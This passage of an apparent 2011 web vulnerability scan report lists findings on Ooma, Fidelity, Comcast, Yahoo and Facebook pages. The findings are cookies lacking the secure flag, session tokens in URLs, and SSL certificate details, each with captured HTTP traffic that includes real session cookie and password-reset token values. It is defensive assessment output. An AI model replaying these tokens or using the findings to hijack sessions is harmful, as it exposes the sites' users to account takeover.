The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


5.1. https://go.ooma.com/activate

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.ooma.com
Path:   /activate

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activate HTTP/1.1
Host: go.ooma.com
Connection: keep-alive
Referer: http://www.ooma.com/premier/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; __utmx=238888606.; __utmxx=238888606.; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.4.9.1315330042209; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:26 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 2
ETag: "f35db0f6a1d8e5db3773e81ab260a95a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _myooma_activator_session=BAh7BjoPc2Vzc2lvbl9pZCIlMGVmMmQ4ZmI4NjkyMGVmZDhjZTEwNjcxMzNjZTkwMmY%3D--83b84308728419d82e46f4c6aac067960bf7bbc3; path=/; HttpOnly
Content-Length: 6666
Status: 200
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

5.2. https://go.ooma.com/activate/activation_code

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://go.ooma.com
Path:   /activate/activation_code

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activate/activation_code HTTP/1.1
Host: go.ooma.com
Connection: keep-alive
Referer: https://go.ooma.com/activate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; __utmx=238888606.; __utmxx=238888606.; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.4.9.1315330042209; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _myooma_activator_session=BAh7BjoPc2Vzc2lvbl9pZCIlNGM2MzJhOWI3ODE3ZGYxYTE5MjYwZWQ3NDAyZjRhMzU%3D--65ecf6f39771ab33b4a7e4b00e4e18a63f258cb0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:12 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 2
ETag: "a707bda799f1400f40a40290826208eb"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _myooma_activator_session=BAh7BjoPc2Vzc2lvbl9pZCIlNGM2MzJhOWI3ODE3ZGYxYTE5MjYwZWQ3NDAyZjRhMzU%3D--65ecf6f39771ab33b4a7e4b00e4e18a63f258cb0; path=/; HttpOnly
Content-Length: 9128
Status: 200
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

5.3. https://www.fidelity.com/welcome/200-free-trades

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.fidelity.com
Path:   /welcome/200-free-trades

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome/200-free-trades HTTP/1.1
Host: www.fidelity.com
Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC=90Vi^mj6PDU08DaQWofS_WBSF08SAk5mFqEKAyjtIAApBQACqjMGBAAAAQAGBU5mFqEAP03

Response

HTTP/1.1 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Length: 27674
Content-Type: text/html;charset=ISO-8859-1
Fsreqid: REQ4e6616b80a0328ee200040e30004aa33
Fscalleeid: fidweb321
Fselapsedtime: 64690
Date: Tue, 06 Sep 2011 12:48:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0857CAA8FA2A66D639C8268989A40DB3; path=/


...[SNIP]...

5.4. https://www.comcast.com/Localization/Localize.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Localization/Localize.cspx?Referer=%2FShop%2FBuyFlow2%2Fproducts.cspx&SourcePage=Bundled&FormName=AddressOrZipCode&StreetName=&AptNumber=&Zip= HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331733|PC#1315327839174-766376.19#1316539473|check#true#1315329933; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331673649%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520custcare%2520%7C1315331673661%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":6,"lc":{"d0":{"v":6,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 24713
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; domain=comcast.com; path=/
Date: Tue, 06 Sep 2011 12:24:44 GMT
Connection: Keep-Alive
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...

5.5. https://www.comcast.com/includes/js/IDGenerator.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /includes/js/IDGenerator.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/IDGenerator.ashx HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B; fsr.a=1315328362332

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Expires: Tue, 06 Sep 2011 11:58:21 GMT
Content-Length: 0


6. Session token in URL
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


6.1. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 174
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Test & Target

mboxFactories.get('default').get('Search_Image_Promos',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");

6.2. https://login.comcast.net/myaccount/lookup

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/lookup

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:26 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=322
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 12359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
   
   
   <title>Forgot your Comcast ID?</title>
   <link rel="stylesheet" type="text/css" href=
...[SNIP]...

6.3. http://omg.yahoo.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 70391

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

   
   <title>omg! Celebrity gossip, news, photos, babies, couples, hotties, and more - omg! on Ya
...[SNIP]...
<noscript>
                           <iframe src="/xhr/ad/LREC/2115806991?ref=aHR0cDovL2Zyb250aWVyLm15LnlhaG9vLmNvbS8=&token=f7250a74b26133b5a75cb0774f0712c3" width="300" height="270" frameborder="0" border="0" marginheight="0" marginwidth="0" scrolling="No"></iframe>
...[SNIP]...

6.4. http://omg.yahoo.com/xhr/ad/LREC/2115806991

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115806991

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xhr/ad/LREC/2115806991?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.5
Content-Length: 4999

<html><body><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=mHDg8mKIOPrpARpjTl.wjQhBMhd7ak5mFjIABjlT&ad_type=iframe&ad_siz
...[SNIP]...

6.5. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=117892634961387&app_id=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aa62330c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cb8067c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd792ca%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df244af3cd8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e5d649a8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.33.58
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 264

<script type="text/javascript">
parent.postMessage("cb=f244af3cd8&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent&transport=postmessage&frame=f19a36be4"
...[SNIP]...

6.6. http://www.websitealive9.com/2140/visitor/vTrackerSrc_v2.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.websitealive9.com
Path:   /2140/visitor/vTrackerSrc_v2.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /2140/visitor/vTrackerSrc_v2.asp?action=poll&groupid=2140&websiteid=344&departmentid=0&sessionid_=5023123106106&dt=Free%20Home%20Phone%20Service%20%7C%20Ooma&dl=http%3A%2F%2Fwww.ooma.com%2F&rf=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&wsa_custom_str=^^^^&random=0.13534958101809025 HTTP/1.1
Host: www.websitealive9.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSBBAQDQ=KNPPIJFCDJONDIJLJCFHAILK

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-store, must-revalidate, private
Pragma: no-cache
P3P: CP="NOI DSP COR CURa OUR NOR"
Content-Length: 0
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Cache-control: private


7. SSL certificate
There are 15 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



7.1. https://login.yahoo.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  login.yahoo.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 20 18:00:00 GMT-06:00 2010
Valid to:  Thu Jan 03 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Jan 13 13:20:32 GMT-06:00 2010
Valid to:  Wed Sep 30 12:19:47 GMT-06:00 2015

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

7.2. https://www.comcastsupport.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  www.comcastsupport.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Tue May 17 18:00:00 GMT-06:00 2011
Valid to:  Fri Jul 20 17:59:59 GMT-06:00 2012

7.3. https://www.frontier.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.frontier.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Sun May 01 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 07 06:00:00 GMT-06:00 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

7.4. https://customer.comcast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.comcast.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  customer.comcast.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Mon Oct 05 18:00:00 GMT-06:00 2009
Valid to:  Sat Oct 08 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

7.5. https://go.ooma.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.ooma.com
Path:   /

Issue detail

